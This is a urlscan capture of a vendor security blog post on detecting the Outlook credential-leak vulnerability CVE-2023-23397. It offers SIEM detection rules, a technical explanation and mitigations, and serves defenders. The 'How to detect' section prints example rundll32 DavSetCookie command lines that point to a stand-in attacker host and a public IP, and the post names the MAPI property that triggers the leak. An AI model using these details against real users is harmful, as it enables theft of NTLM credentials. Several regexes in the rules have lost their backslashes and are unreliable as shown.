cardinalops.com Open in urlscan Pro
35.212.82.163  Public Scan

Form analysis
0 forms found in the DOM

Text Content

×

This website stores cookies on your computer. These cookies are used to collect
information about how you interact with our website and allow us to remember
you. We use this information in order to improve and customize your browsing
experience and for analytics and metrics about our visitors both on this website
and other media. To find out more about the cookies we use, see our Privacy
Policy

If you decline, your information won’t be tracked when you visit this website. A
single cookie will be used in your browser to remember your preference not to be
tracked.

Accept Decline
Skip to content
 * Platform
 * Use Cases
   
   Use Cases
   
    * Map all your detections to MITRE ATT&CK
    * Gain new detections to address critical gaps
    * Identify and fix broken rules
    * Pinpoint root causes of noisy rules
    * Save costs and rationalize your entire security stack
    * Measure the depth of ATT&CK coverage
    * Automate to gain agility and address hiring challenges
    * Jumpstart cloud monitoring for your SOC
    * Report on detection posture to leadership and auditors
    * Manage detection posture across multiple SIEMs

 * Integrations
 * Company
   
   Company
   
    * Who we are
      
      Meet the leadership team, advisors, investors, and mission that drive us
      forward.
   
    * Why work here
      
      Big challenges need big thinkers. Are you up to it?
   
    * Careers
      
      Your opportunity to make a difference … for our customers, the world, and
      yourself.

 * Resources
   
   Resources
   
    * Newsroom
    * Blog
    * White Papers & Videos
    * Webinars & Events

 * Contact Us
 * Book a Demo

HOME Resources Blog Detecting Microsoft Outlook Vulnerability CVE-2023-23397 in
Splunk, IBM QRadar & Microsoft Sentinel
 * Blog
 * Newsroom
 * Webinars & Events
 * White Papers & Videos


March 20, 2023

|

Tamir Oren Bar-Hai


DETECTING MICROSOFT OUTLOOK VULNERABILITY CVE-2023-23397 IN SPLUNK, IBM QRADAR &
MICROSOFT SENTINEL


SUMMARY

Discovered by the Ukrainian CERT and attributed to APT28 (aka Fancy Bear or
Strontium, the Russian GRU threat actor), CVE-2023-23397 is being actively
exploited in targeted attacks against government, transportation, energy, and
military sectors in Europe. 

With a CVSS rating of 9.8 – due to its elevation of privileges and ease of
exploitation – it affects all versions of Outlook for Windows and is
particularly serious because it steals credentials before the user has even
opened a specially-crafted email. 

Attackers can then use the stolen credential to move laterally within the
network in order to gather more information and compromise crown-jewel assets. 

It’s also interesting that this attack is a variation of pass-the-hash (PtH)
which has been around since the late 90s.

This blog post includes detection rules for Splunk, IBM QRadar, and Microsoft
Sentinel as well as a detailed technical description of the vulnerability and
how it can be exploited.

If you’re currently using the CardinalOps detection posture management platform,
these rules are now being delivered to your portals. 

As usual, the rules delivered to CardinalOps users are auto-customized to your
environment (indexes, naming conventions, etc.). This enables you to quickly
review, automatically test, and push them to your SIEM – via its native API –
from the CardinalOps platform.

This blog post describes:

 * Relevant MITRE techniques for CVE-2023-23397
 * Splunk, IBM QRadar, and Sentinel detections for CVE-2023-23397
 * How CVE-2023-23397 works
 * Technical details for CVE-2023-23397
 * How to detect CVE-2023-23397
 * Other mitigations for CVE-2023-23397


RELEVANT MITRE TECHNIQUES FOR CVE-2023-23397

Exploitation for Privilege Escalation (T1068)

Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay (T1557.001)

Forced Authentication (T1187)

Exploitation for Credential Access (T1212)

Post-Exploitation

OS Credential Dumping: LSASS Memory (T1003.001)

Use Alternate Authentication Material (T1550)


DETECTIONS FOR MICROSOFT OUTLOOK VULNERABILITY (CVE-2023-23397)

These rules will alert when a rundll32.exe uses webdav to access a public IP
address and in the same time range that an NTLM authentication outbound event is
registered with the same public IP address as the destination machine.


SPLUNK DETECTION RULES FOR MICROSOFT OUTLOOK VULNERABILITY (CVE-2023-23397)

index={your_index} sourcetype={your_4688_sourcetype} EventCode=4688
New_Process_Name="*rundll32.exe*" Process_Command_Line="*davclnt.dll*"
New_Process_Name="*DavSetCookie*" "davclnt" "rundll32" "DavSetCookie" | rex
field=Process_Command_Line
"DavSetCookies+(?<IP_Address>d{1,3}.d{1,3}.d{1,3}.d{1,3})"  | rex
field=Process_Command_Line
"DavSetCookies+(?<IP_Address>((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))"
| eval isLocal=if((cidrmatch("192.168.0.0/16", IP_Address) OR
cidrmatch("10.0.0.0/8", IP_Address) OR cidrmatch("172.16.0.0/12", IP_Address)),
"True", "False") | search isLocal="False" AND IP_Address=*

 

index={your_index} sourcetype={your_NTLM_audit_sourcetype} EventCode=8001| rex
"w+/(?<IP_Address>((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))"
| eval isLocal=if((cidrmatch("192.168.0.0/16", IP_Address) OR
cidrmatch("10.0.0.0/8", IP_Address) OR cidrmatch("172.16.0.0/12", IP_Address)),
"True", "False") | search isLocal="False"

[updated]


 


SPLUNK CORRELATION SEARCH FOR MICROSOFT OUTLOOK VULNERABILITY (CVE-2023-23397)

search (index={your_index} sourcetype={your_NTLM_audit_sourcetype}
EventCode=8001) OR (index={your_index} sourcetype={your_4688_sourcetype}
EventCode=4688 New_Process_Name="*rundll32.exe*"
Process_Command_Line="*davclnt.dll*" New_Process_Name="*DavSetCookie*" "davclnt"
"rundll32" "DavSetCookie") 

 

| rex field=Process_Command_Line
"DavSetCookies+(?<IP_Address>((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))" 

| rex
"w+/(?<IP_Address>((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))" 

| eval IP_Address=case(EventCode==4688, 'IP_Address_4688', EventCode==8001,
'IP_Address_8001')

| eval isLocal=if((cidrmatch("192.168.0.0/16", IP_Address) OR
cidrmatch("10.0.0.0/8", IP_Address) OR cidrmatch("172.16.0.0/12", IP_Address)),
"True", "False")

| search isLocal="False" 

| stats dc(EventCode) as EventCode_count count by IP_Address 
 
| where EventCode_count > 1

[updated]

Note: Time range can be set using the Splunk search console.


IBM QRADAR DETECTION RULE FOR MICROSOFT OUTLOOK VULNERABILITY (CVE-2023-23397)

and when the event(s) were detected by one or more of Microsoft Windows Security
Event Log

and when the event matches EventID (custom) is any of 4688

and when the event matches ProcessName (custom) is any of rundll32.exe

and when the event matches Process CommandLine (custom) contains any of
davclnt.dll

and when the event matches Process CommandLine (custom) matches any of
expressions ((?:1d{2}|2[0-4]d|25[0-5]|[1-9]d|[1-9])(?:.(?!$)|$)){4}


MICROSOFT SENTINEL QUERY FOR MICROSOFT OUTLOOK VULNERABILITY (CVE-2023-23397)
WHICH COVERS BOTH WINDOWS LOGS AND DEFENDER LOGS

(union isfuzzy=true
(
DeviceProcessEvents
| where ProcessCommandLine has_all ("davclnt.dll", "DavSetCookie") and FileName
=~ "rundll32.exe"
| extend IPaddress =
extract("((\d{1,3})\.(\d{1,3})\.(\d{1,3})\.((\d{1,3})))",1,ProcessCommandLine) 
| where isnotempty(IPaddress)
| project-reorder DeviceName, AccountName, AccountUpn, FolderPath,
ProcessCommandLine, InitiatingProcessFolderPath, InitiatingProcessCommandLine,
TimeGenerated
),
(
SecurityEvent
| where EventID == 4688 and Process =~ "rundll32.exe" and CommandLine has_all
("davclnt.dll", "DavSetCookie")
| extend IPaddress =
extract("((\d{1,3})\.(\d{1,3})\.(\d{1,3})\.((\d{1,3})))",1,CommandLine) 
| where isnotempty(IPaddress)
| extend DeviceName=Computer
| project-reorder DeviceName, NewProcessName, IpAddress, CommandLine, Account,
TargetAccount, TimeGenerated 
)
)


HOW CVE-2023-23397 WORKS

On March 14th, 2023, A serious vulnerability affecting Microsoft Outlook was
patched by Microsoft.

This vulnerability has existed in multiple versions for more than a decade. The
affected versions are Outlook for Windows 2013 up to 2019 including the
Microsoft 365 (Office 365) versions. Older versions could also be vulnerable but
are not tested or supported. 

TL;DR – Adversary sending an email with the affected properties will trigger an
SMB outbound connection, causing your machine to send out your NTLM hash (your
encrypted password along with your username in clear text).

Not to be confused with NT-HASH which is the one used in Pass-the–Hash (PtH)
attacks. This NTLM hash contains an encrypted form of your password and will
require the adversary to bruteforce this encrypted credential before gaining
access to your clear text password.

The time for the bruteforce attack to succeed is dependent on your password
length and complexity (can range from seconds to years).

Of course there are other methods that can speed up the guessing process (e.g.,
Hashcat permutations) so we need to act quickly to prevent and detect this
vulnerability exploitation attempts.

Another approach to exploit this vulnerability is to relay the NTLM packets to a
target server or workstation.

Think of the IT admin using an unpatched Outlook version causing their machine
to send out an NTLM packet. This packet will be captured by the adversary and
relayed to another machine on the network, say the HR or Finance department head
(or someone in DevOps). Now those machines have accepted the IT admin
credentials to login into their machine. Any command can then be executed by the
adversary, on behalf of the IT admin.

Getting Creds via NTLMv2 | 0xdf hacks stuff

Of course, for this to occur the adversary needs to have established a foothold
on your network, unless you allow outbound and inbound SMB traffic from the
internet (we never allow that, right?).

To summarize, we have two outcomes from the exploitation of this Outlook
vulnerability: A possible password compromise and access to remote machines. 


 


TECHNICAL DETAILS FOR CVE-2023-23397

Let’s dive into more details:

 * The Outlook client automatically parses and executes crafted messages
   containing attributes controlling the MAPI properties allowing to set
   “reminder notification” sound file location. 
 * The execution is performed silently, without any indication to the end user. 
 * The crafted messages can be a shared Outlook task or a calendar invite type
   of a message.
 * The specific MAPI properties are PidLidReminderFileParameter  and
   PidLidReminderOverride.
 * Once these properties are set and the PidLidReminderFileParameter is pointing
   to an adversary’s controlled machine – this is the culprit and that is the
   reason we are reading this article .

The processing of the path to the reminder sound file location is mostly
triggered by Exchange based systems (on-prem and cloud).

Even Hotmail seems to do the same – Will Dormann on Twitter: “So, all of this
wondering about how to send a “rich” calendar invite over SMTP is moot. The
actual exploit for CVE-2023-23397 is an IPM.Task item with 0x851F
(PidLidReminderFileParameter) set. This is just fine as a TNEF attachment over
SMTP. https://t.co/yGSiR4B6wh https://t.co/7GIvb6zGlA” / Twitter

Once the Outlook client is able to process the malformed mail item, the outbound
SMB packet is sent, without any notification or user interaction. 

It seems that even after applying the patch, Microsoft allows the reminder sound
file to be loaded by pointing to a hostname. This can be leveraged internally on
the network or can be used to access the public IP, if the hosts file is
manipulated.  Will Dormann on Twitter: “So, all of this wondering about how to
send a “rich” calendar invite over SMTP is moot. The actual exploit for
CVE-2023-23397 is an IPM.Task item with 0x851F (PidLidReminderFileParameter)
set. This is just fine as a TNEF attachment over SMTP. https://t.co/yGSiR4B6wh
https://t.co/7GIvb6zGlA” / Twitter

Another nice “feature” of this vulnerability is the ability to trigger legacy
capabilities in Windows that if not managed, can leak credentials. For example,
by using a non-existent host name in the reminder file path, the adversary can
cause LLMNR and NBT-NS broadcast and multicast requests. See
https://attack.mitre.org/techniques/T1557/001/ for details. 


 


HOW TO DETECT CVE-2023-23397

The process command line on the victim’s machine can be identified by the
following format:

rundll32.exe C:Windowssystem32davclnt.dll,DavSetCookie [ip address or a domain
name] http://[ip address or a domain name]/[path to the a file or a directory]

For example:

rundll32.exe C:Windowssystem32davclnt.dll,DavSetCookie 35.180.139.74
http://35.180.139.74/file/sound.wav

rundll32.exe C:Windowssystem32davclnt.dll,DavSetCookie badguy
http://badguy_domain.com/file/sound.wav

The format can also be found to be shorter: 

rundll32.exe C:Windowssystem32davclnt.dll,DavSetCookie
http://35.180.139.74/file/sound.wav

rundll32.exe C:Windowssystem32davclnt.dll,DavSetCookie 
http://badguy_domain.com/file/sound.wav

Even though the command line is stating http protocol – the Windows machine will
send an SMB packet on port 445. 

We need to detect when a DavSetCookie function is accessing a public IP address.
This can be normal for a home PC but might be questionable for an enterprise
machine. This detection can point out public IP addresses your enterprise
clients are using and are trustworthy but anything other than the known good
should trigger a deeper investigation. 

If we are on the topic of identifying DLL functions we should also remember to
have detections to identify the use of a DLL function using the function’s
ordinal value. In this case (not tested but typically works), the command could
potentially be:

rundll32 c:windowssystem32davclnt.dll,#6 35.180.139.74
http://35.180.139.74/share

For more details, see:

https://research.splunk.com/endpoint/6c135f8d-5e60-454e-80b7-c56eed739833/
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md#atomic-test-11—rundll32-with-ordinal-value

yara-rulz/Outlook_CVE_2023_23397.yara at main · elceef/yara-rulz (github.com)

Another powerful detection source can be leveraged by enabling “Outbound NTLM
traffic to remote servers” in the security options. This enables the audit of
outbound NTLM authentication traffic so you can identify where your desktops and
servers are sending their NTLM hashes. 

Example event log:

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-DUR-001_pic2.png
https://www.windows-security.org/c526612a90004088b250158bc5e7dc2d/network-security-restrict-ntlm-outgoing-ntlm-traffic-to-remote


 


OTHER MITIGATIONS FOR CVE-2023-23397

Microsoft suggests to block outbound port 445 and make use of the Protected
Users Active Directory group. This is good advice except “Protected Users” is
usually not a good fit for the standard user. Test wisely. 

We suggest also reviewing your security posture to make sure other vectors are
not making it easy for the adversary.  

 1. Ensure your machines are configured to send out only NTLM-v2 and not one of
    the weaker options. Specifically: configure “Send NTLMv2 responses only.
    Refuse LM & NTLM.”  For more information see 
    https://learn.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-security-lan-manager-authentication-level
 2. The fact that we can trigger any outlook user to send his NTLM hash to any
    destination can affect home users (think the C-level or IT admins) – even if
    the adversary cracks the NTLM – the adversary still needs to get lucky and
    find an interface without MFA. So make sure your home users use MFA for any
    interface they use from their home PC!
 3. To mitigate the NTLM relay attack vector: ensure SMB server signing is
    enabled on workstations and servers. Configure workstations to block inbound
    SMB(port 445) and enable exceptions to specific machines allowed to access
    workstation over the network using port 445.

Blog



BOOST PRODUCTIVITY 10X … REALLY?

CardinalOps’ detection posture management platform maximizes your MITRE ATT&CK
coverage for the latest threats and eliminates hidden detection gaps which you
may not even know you have. Setup takes less than an hour because there are no
agents to deploy or appliances to configure, and it easily connects via the
native APIs of your SIEM/XDR. What’s more, it helps boost your detection
engineering team’s productivity 10x compared to manual processes.

Yes, really.


Book a Demo

 * Privacy Policy
 * Terms & Conditions

©2023 CardinalOps